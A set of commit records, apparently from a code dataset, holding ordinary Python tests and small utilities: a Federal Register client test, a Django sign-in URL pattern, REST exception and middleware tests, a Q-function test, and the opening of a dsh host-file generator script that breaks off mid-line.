cmc333333/regulations-parser,jmcarp/regulations-parser,tadhg-ohiggins/regulations-parser,tadhg-ohiggins/regulations-parser,grapesmoker/regulations-parser,eregs/regulations-parser,EricSchles/regulations-parser,adderall/regulations-parser,willbarton/regulations-parser,cmc333333/regulations-parser,ascott1/regulations-parser,eregs/regulations-parser
|
Add tests for federal register client
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
<commit_before><commit_msg>Add tests for federal register client<commit_after>
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
Add tests for federal register clientfrom mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
<commit_before><commit_msg>Add tests for federal register client<commit_after>from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
|
8a70a4db5577eaaf7e45f4865fdf49ecb855afe0
|
precision/accounts/urls.py
|
precision/accounts/urls.py
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
Add url pattern for SignInView class
|
Add url pattern for SignInView class
|
Python
|
mit
|
FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management,FreeCodeCampRoma/precision_school-management
|
Add url pattern for SignInView class
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
<commit_before><commit_msg>Add url pattern for SignInView class<commit_after>
|
from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
Add url pattern for SignInView classfrom django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
<commit_before><commit_msg>Add url pattern for SignInView class<commit_after>from django.conf.urls import url
from .views import SignInView
urlpatterns = [
url(
regex=r'^sign-in/$',
view=SignInView.as_view(),
name='login'
),
]
|
|
fcfc56bdbe2d9cf1173ac54f75e59c270b1bbbd3
|
tests/test_exceptions.py
|
tests/test_exceptions.py
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
Add unit testing of custom exceptions
|
Add unit testing of custom exceptions
|
Python
|
mit
|
soccermetrics/soccermetrics-client-py
|
Add unit testing of custom exceptions
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
<commit_before><commit_msg>Add unit testing of custom exceptions<commit_after>
|
import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
Add unit testing of custom exceptionsimport unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
<commit_before><commit_msg>Add unit testing of custom exceptions<commit_after>import unittest
from soccermetrics import SoccermetricsRestException
class RestExceptionFormatTest(unittest.TestCase):
def setUp(self):
self.exc = SoccermetricsRestException(404,"/path/to/resource")
def test_exception_status(self):
self.assertEqual(self.exc.status, 404)
def test_exception_uri(self):
self.assertEqual(self.exc.uri, "/path/to/resource")
def test_exception_msg(self):
self.assertEqual(self.exc.msg, "")
def test_exception_string(self):
self.assertEqual(str(self.exc), "HTTP ERROR 404: \n /path/to/resource")
def test_exception_with_msg(self):
local = SoccermetricsRestException(404,"/path/to/resource",msg="Invalid resource request.")
self.assertEqual(str(local), "HTTP ERROR 404: Invalid resource request. \n /path/to/resource")
|
|
a68e78bd0b5174d2c8a40497d3d5842f66c65a34
|
tests/test_middleware.py
|
tests/test_middleware.py
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
Add test integrated with middleware
|
Add test integrated with middleware
|
Python
|
bsd-2-clause
|
thedrow/django-rest-framework-1,tomchristie/django-rest-framework,YBJAY00000/django-rest-framework,edx/django-rest-framework,VishvajitP/django-rest-framework,arpheno/django-rest-framework,bluedazzle/django-rest-framework,nhorelik/django-rest-framework,qsorix/django-rest-framework,vstoykov/django-rest-framework,werthen/django-rest-framework,MJafarMashhadi/django-rest-framework,ticosax/django-rest-framework,iheitlager/django-rest-framework,akalipetis/django-rest-framework,potpath/django-rest-framework,raphaelmerx/django-rest-framework,maryokhin/django-rest-framework,brandoncazander/django-rest-framework,kgeorgy/django-rest-framework,HireAnEsquire/django-rest-framework,canassa/django-rest-framework,thedrow/django-rest-framework-1,leeahoward/django-rest-framework,douwevandermeij/django-rest-framework,justanr/django-rest-framework,atombrella/django-rest-framework,kennydude/django-rest-framework,linovia/django-rest-framework,yiyocx/django-rest-framework,raphaelmerx/django-rest-framework,alacritythief/django-rest-framework,tcroiset/django-rest-framework,abdulhaq-e/django-rest-framework,jtiai/django-rest-framework,sbellem/django-rest-framework,MJafarMashhadi/django-rest-framework,James1345/django-rest-framework,tomchristie/django-rest-framework,dmwyatt/django-rest-framework,wzbozon/django-rest-framework,rafaelcaricio/django-rest-framework,sbellem/django-rest-framework,jerryhebert/django-rest-framework,jpulec/django-rest-framework,wzbozon/django-rest-framework,d0ugal/django-rest-framework,cheif/django-rest-framework,vstoykov/django-rest-framework,wwj718/django-rest-framework,sheppard/django-rest-framework,James1345/django-rest-framework,maryokhin/django-rest-framework,johnraz/django-rest-framework,wedaly/django-rest-framework,nryoung/django-rest-framework,douwevandermeij/django-rest-framework,hnakamur/django-rest-framework,potpath/django-rest-framework,uruz/django-rest-framework,leeahoward/django-rest-framework,uploadcare/django-rest-framework,simudream/django-rest-framework,johnraz/django-rest-framework,arpheno/django-rest-framework,damycra/django-rest-framework,maryokhin/django-rest-framework,rubendura/django-rest-framework,damycra/django-rest-framework,justanr/django-rest-framework,hunter007/django-rest-framework,kylefox/django-rest-framework,VishvajitP/django-rest-framework,xiaotangyuan/django-rest-framework,lubomir/django-rest-framework,pombredanne/django-rest-framework,uruz/django-rest-framework,nhorelik/django-rest-framework,rubendura/django-rest-framework,aericson/django-rest-framework,waytai/django-rest-framework,sbellem/django-rest-framework,dmwyatt/django-rest-framework,brandoncazander/django-rest-framework,davesque/django-rest-framework,werthen/django-rest-framework,arpheno/django-rest-framework,rhblind/django-rest-framework,canassa/django-rest-framework,ambivalentno/django-rest-framework,jtiai/django-rest-framework,bluedazzle/django-rest-framework,VishvajitP/django-rest-framework,hnarayanan/django-rest-framework,cyberj/django-rest-framework,James1345/django-rest-framework,jpulec/django-rest-framework,rafaelcaricio/django-rest-framework,HireAnEsquire/django-rest-framework,fishky/django-rest-framework,uruz/django-rest-framework,agconti/django-rest-framework,ashishfinoit/django-rest-framework,brandoncazander/django-rest-framework,kezabelle/django-rest-framework,ezheidtmann/django-rest-framework,sheppard/django-rest-framework,rhblind/django-rest-framework,hnakamur/django-rest-framework,krinart/django-rest-framework,kylefox/django-rest-framework,simudream/django-rest-framework,rafaelcaricio/django-rest-framework,lubomir/django-rest-framework,rafaelang/django-rest-framework,wangpanjun/django-rest-framework,ossanna16/django-rest-framework,ossanna16/django-rest-framework,mgaitan/django-rest-framework,lubomir/django-rest-framework,kennydude/django-rest-framework,hnarayanan/django-rest-framework,jness/django-rest-framework,alacritythief/django-rest-framework,xiaotangyuan/django-rest-framework,elim/django-rest-framework,d0ugal/django-rest-framework,ebsaral/django-rest-framework,kezabelle/django-rest-framework,qsorix/django-rest-framework,cheif/django-rest-framework,wzbozon/django-rest-framework,iheitlager/django-rest-framework,edx/django-rest-framework,jtiai/django-rest-framework,mgaitan/django-rest-framework,zeldalink0515/django-rest-framework,qsorix/django-rest-framework,kylefox/django-rest-framework,ambivalentno/django-rest-framework,agconti/django-rest-framework,johnraz/django-rest-framework,zeldalink0515/django-rest-framework,damycra/django-rest-framework,aericson/django-rest-framework,hunter007/django-rest-framework,ticosax/django-rest-framework,waytai/django-rest-framework,atombrella/django-rest-framework,elim/django-rest-framework,gregmuellegger/django-rest-framework,sehmaschine/django-rest-framework,andriy-s/django-rest-framework,jpadilla/django-rest-framework,mgaitan/django-rest-framework,leeahoward/django-rest-framework,andriy-s/django-rest-framework,akalipetis/django-rest-framework,abdulhaq-e/django-rest-framework,antonyc/django-rest-framework,davesque/django-rest-framework,ticosax/django-rest-framework,wwj718/django-rest-framework,yiyocx/django-rest-framework,AlexandreProenca/django-rest-framework,alacritythief/django-rest-framework,yiyocx/django-rest-framework,tigeraniya/django-rest-framework,kennydude/django-rest-framework,fishky/django-rest-framework,raphaelmerx/django-rest-framework,bluedazzle/django-rest-framework,cyberj/django-rest-framework,sehmaschine/django-rest-framework,AlexandreProenca/django-rest-framework,sehmaschine/django-rest-framework,nryoung/django-rest-framework,gregmuellegger/django-rest-framework,jerryhebert/django-rest-framework,antonyc/django-rest-framework,MJafarMashhadi/django-rest-framework,dmwyatt/django-rest-framework,ossanna16/django-rest-framework,zeldalink0515/django-rest-framework,ebsaral/django-rest-framework,nryoung/django-rest-framework,fishky/django-rest-framework,ajaali/django-rest-framework,hunter007/django-rest-framework,xiaotangyuan/django-rest-framework,tigeraniya/django-rest-framework,callorico/django-rest-framework,cyberj/django-rest-framework,paolopaolopaolo/django-rest-framework,wangpanjun/django-rest-framework,adambain-vokal/django-rest-framework,ambivalentno/django-rest-framework,hnakamur/django-rest-framework,ezheidtmann/django-rest-framework,YBJAY00000/django-rest-framework,d0ugal/django-rest-framework,pombredanne/django-rest-framework,HireAnEsquire/django-rest-framework,nhorelik/django-rest-framework,canassa/django-rest-framework,abdulhaq-e/django-rest-framework,ebsaral/django-rest-framework,davesque/django-rest-framework,rubendura/django-rest-framework,douwevandermeij/django-rest-framework,jness/django-rest-framework,kgeorgy/django-rest-framework,wwj718/django-rest-framework,jerryhebert/django-rest-framework,ashishfinoit/django-rest-framework,jness/django-rest-framework,kgeorgy/django-rest-framework,delinhabit/django-rest-framework,rhblind/django-rest-framework,sheppard/django-rest-framework,callorico/django-rest-framework,gregmuellegger/django-rest-framework,waytai/django-rest-framework,ezheidtmann/django-rest-framework,ashishfinoit/django-rest-framework,tigeraniya/django-rest-framework,wedaly/django-rest-framework,delinhabit/django-rest-framework,krinart/django-rest-framework,ajaali/django-rest-framework,buptlsl/django-rest-framework,jpadilla/django-rest-framework,uploadcare/django-rest-framework,hnarayanan/django-rest-framework,jpadilla/django-rest-framework,simudream/django-rest-framework,delinhabit/django-rest-framework,iheitlager/django-rest-framework,paolopaolopaolo/django-rest-framework,justanr/django-rest-framework,andriy-s/django-rest-framework,jpulec/django-rest-framework,aericson/django-rest-framework,AlexandreProenca/django-rest-framework,agconti/django-rest-framework,callorico/django-rest-framework,elim/django-rest-framework,kezabelle/django-rest-framework,linovia/django-rest-framework,cheif/django-rest-framework,tcroiset/django-rest-framework,akalipetis/django-rest-framework,wangpanjun/django-rest-framework,vstoykov/django-rest-framework,buptlsl/django-rest-framework,adambain-vokal/django-rest-framework,atombrella/django-rest-framework,YBJAY00000/django-rest-framework,paolopaolopaolo/django-rest-framework,thedrow/django-rest-framework-1,linovia/django-rest-framework,uploadcare/django-rest-framework,rafaelang/django-rest-framework,ajaali/django-rest-framework,potpath/django-rest-framework,wedaly/django-rest-framework,rafaelang/django-rest-framework,adambain-vokal/django-rest-framework,buptlsl/django-rest-framework,tcroiset/django-rest-framework,antonyc/django-rest-framework,werthen/django-rest-framework,edx/django-rest-framework,pombredanne/django-rest-framework,krinart/django-rest-framework,tomchristie/django-rest-framework
|
Add test integrated with middleware
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
<commit_before><commit_msg>Add test integrated with middleware<commit_after>
|
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
Add test integrated with middleware
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
<commit_before><commit_msg>Add test integrated with middleware<commit_after>
from django.conf.urls import patterns, url
from django.contrib.auth.models import User
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework.views import APIView
urlpatterns = patterns(
'',
url(r'^$', APIView.as_view(authentication_classes=(TokenAuthentication,))),
)
class MyMiddleware(object):
def process_response(self, request, response):
assert hasattr(request, 'user'), '`user` is not set on request'
assert request.user.is_authenticated(), '`user` is not authenticated'
return response
class TestMiddleware(APITestCase):
urls = 'tests.test_middleware'
def test_middleware_can_access_user_when_processing_response(self):
user = User.objects.create_user('john', 'john@example.com', 'password')
key = 'abcd1234'
Token.objects.create(key=key, user=user)
with self.settings(
MIDDLEWARE_CLASSES=('tests.test_middleware.MyMiddleware',)
):
auth = 'Token ' + key
self.client.get('/', HTTP_AUTHORIZATION=auth)
|
|
18ade96032dbbeaee6f96ff364cb3dc8726970da
|
tests/test_q_function.py
|
tests/test_q_function.py
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should be result in 75
# percents of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
Add a test for QFunction
|
Add a test for QFunction
|
Python
|
mit
|
toslunar/chainerrl,toslunar/chainerrl
|
Add a test for QFunction
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should be result in 75
# percents of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
<commit_before><commit_msg>Add a test for QFunction<commit_after>
|
import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should be result in 75
# percents of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
Add a test for QFunctionimport unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should be result in 75
# percents of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
<commit_before><commit_msg>Add a test for QFunction<commit_after>import unittest
import random
import numpy as np
import q_function
class TestQFunction(unittest.TestCase):
def setUp(self):
pass
def test_sample(self):
q_func = q_function.FCSIQFunction(1, 2, 10, 2)
N = 1000
greedy_count = 0
for _ in xrange(N):
random_state = np.asarray([[random.random()]], dtype=np.float32)
values = q_func.forward(random_state).data
print 'q values:', values
# Greedy
a, q = q_func.sample_greedily_with_value(random_state)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0, equivalent to greedy
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0)
self.assertEquals(float(q.data), values.max())
self.assertEquals(a[0], values.argmax())
# Epsilon-greedy with epsilon=0.5, which should be result in 75
# percents of greedy actions
a, q = q_func.sample_epsilon_greedily_with_value(random_state, 0.5)
if a[0] == values.argmax():
self.assertEquals(float(q.data), values.max())
greedy_count += 1
print 'greedy_count', greedy_count
self.assertLess(N * 0.7, greedy_count)
self.assertGreater(N * 0.8, greedy_count)
|
|
f7da0521152101466e6036245ed4ce2f5a0e15fe
|
project-dsh-generator.py
|
project-dsh-generator.py
|
#!/usr/bin/env python3
"""
Simple script that generates hosts files usable with dsh/pssh
for runnign administrative actions on all hosts in a particular
labs project. Salt is just way too unreliable to be useful
for this purpose.
Hits the wikitech API.
You can execute commands via pssh like:
pssh -t0 -p4 -h <hostgroup> '<command>'
This sets parallelism to 4, tweak as necessary.
"""
import json
import sys
from urllib.request import urlopen
project_spec = sys.argv[1]
if project_spec == 'all-instances':
